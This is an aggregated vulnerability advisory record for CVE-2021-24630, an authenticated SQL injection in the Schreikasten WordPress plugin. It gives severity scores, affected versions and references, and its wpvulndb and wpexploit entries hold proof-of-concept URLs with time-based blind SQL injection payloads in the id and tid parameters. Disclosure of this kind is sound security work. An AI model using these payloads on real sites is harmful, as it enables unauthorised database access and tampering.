CVE-2021-24630

2021-11-08T18:15:00

Description

The Schreikasten WordPress plugin through 0.14.18 does not sanitise or escape the id GET parameter before using it in SQL statements in the comments dashboard from various actions, leading to authenticated SQL Injections which can be exploited by users as low as author

Affected Software

CPE Name	Name	Version
schreikasten_project:schreikasten	schreikasten project schreikasten	0.14.18

{"id": "CVE-2021-24630", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24630", "description": "The Schreikasten WordPress plugin through 0.14.18 does not sanitise or escape the id GET parameter before using it in SQL statements in the comments dashboard from various actions, leading to authenticated SQL Injections which can be exploited by users as low as author", "published": "2021-11-08T18:15:00", "modified": "2021-11-10T18:07:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24630", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/a0787dae-a4b7-4248-9960-aaffabfaeb9f", "https://codevigilant.com/disclosure/2021/wp-plugin-schreikasten/"], "cvelist": ["CVE-2021-24630"], "immutableFields": [], "lastseen": "2022-03-23T14:59:40", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F"]}], "rev": 4}, "score": {"value": 3.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F"]}]}, "exploitation": null, "vulnersScore": 3.7}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:schreikasten_project:schreikasten:0.14.18"], "cpe23": ["cpe:2.3:a:schreikasten_project:schreikasten:0.14.18:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "schreikasten_project:schreikasten", "version": "0.14.18", "operator": "le", "name": "schreikasten project schreikasten"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:schreikasten_project:schreikasten:0.14.18:*:*:*:*:wordpress:*:*", "versionEndIncluding": "0.14.18", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/a0787dae-a4b7-4248-9960-aaffabfaeb9f", "name": "https://wpscan.com/vulnerability/a0787dae-a4b7-4248-9960-aaffabfaeb9f", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://codevigilant.com/disclosure/2021/wp-plugin-schreikasten/", "name": "https://codevigilant.com/disclosure/2021/wp-plugin-schreikasten/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}

{"wpvulndb": [{"lastseen": "2021-11-26T19:06:28", "description": "The plugin does not sanitise or escape the id GET parameter before using it in SQL statements in the comments dashboard from various actions, leading to authenticated SQL Injections which can be exploited by users as low as author\n\n### PoC\n\nhttps://example.com/wp-admin/edit-comments.php?page=skmanage&mode;=edit&text;&paged;=1&mode;_x=delete_x&id;=6%20AND%20(SELECT%209304%20FROM%20(SELECT(SLEEP(5)))ghFg) https://example.com/wp-admin/edit-comments.php?page=skmanage&mode;=tracking&text;&paged;=1&mode;_x=delete_x&id;=7&tid;=6%20AND%20(SELECT%209304%20FROM%20(SELECT(SLEEP(5)))ghFg) https://example.com/wp-admin/edit-comments.php?page=skmanage&mode;&text;&paged;=1&mode;_x=set_black_x&id;=2%20AND%20(SELECT%20614%20 FROM (SELECT(SLEEP(5)))ewlo)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "wpvulndb", "title": "Schreikasten <= 0.14.18 - Author+ SQL Injections", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24630"], "modified": "2021-10-07T11:55:40", "id": "WPVDB-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F", "href": "https://wpscan.com/vulnerability/a0787dae-a4b7-4248-9960-aaffabfaeb9f", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:29:31", "description": "SQL Injection (SQLi) vulnerability discovered by Shreya Pohekar (Codevigilant Project) in WordPress Schreikasten plugin (versions <= 0.14.18).\n\n## Solution\n\n\nDeactivate and delete. This plugin has been closed as of June 21, 2021 and is not available for download. Reason: Security Issue.\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "patchstack", "title": "WordPress Schreikasten plugin <= 0.14.18 - SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24630"], "modified": "2021-10-07T00:00:00", "id": "PATCHSTACK:9B6BFF08A794F19148D44A55ED095D48", "href": "https://patchstack.com/database/vulnerability/schreikasten/wordpress-schreikasten-plugin-0-14-18-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-11-26T19:06:28", "description": "The plugin does not sanitise or escape the id GET parameter before using it in SQL statements in the comments dashboard from various actions, leading to authenticated SQL Injections which can be exploited by users as low as author\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "wpexploit", "title": "Schreikasten <= 0.14.18 - Author+ SQL Injections", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24630"], "modified": "2021-10-07T11:55:40", "id": "WPEX-ID:A0787DAE-A4B7-4248-9960-AAFFABFAEB9F", "href": "", "sourceData": "https://example.com/wp-admin/edit-comments.php?page=skmanage&mode=edit&text&paged=1&mode_x=delete_x&id=6%20AND%20(SELECT%209304%20FROM%20(SELECT(SLEEP(5)))ghFg)\r\n\r\nhttps://example.com/wp-admin/edit-comments.php?page=skmanage&mode=tracking&text&paged=1&mode_x=delete_x&id=7&tid=6%20AND%20(SELECT%209304%20FROM%20(SELECT(SLEEP(5)))ghFg)\r\n\r\nhttps://example.com/wp-admin/edit-comments.php?page=skmanage&mode&text&paged=1&mode_x=set_black_x&id=2%20AND%20(SELECT%20614%20 FROM (SELECT(SLEEP(5)))ewlo)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

CVE-2021-24630

Description

Affected Software

Related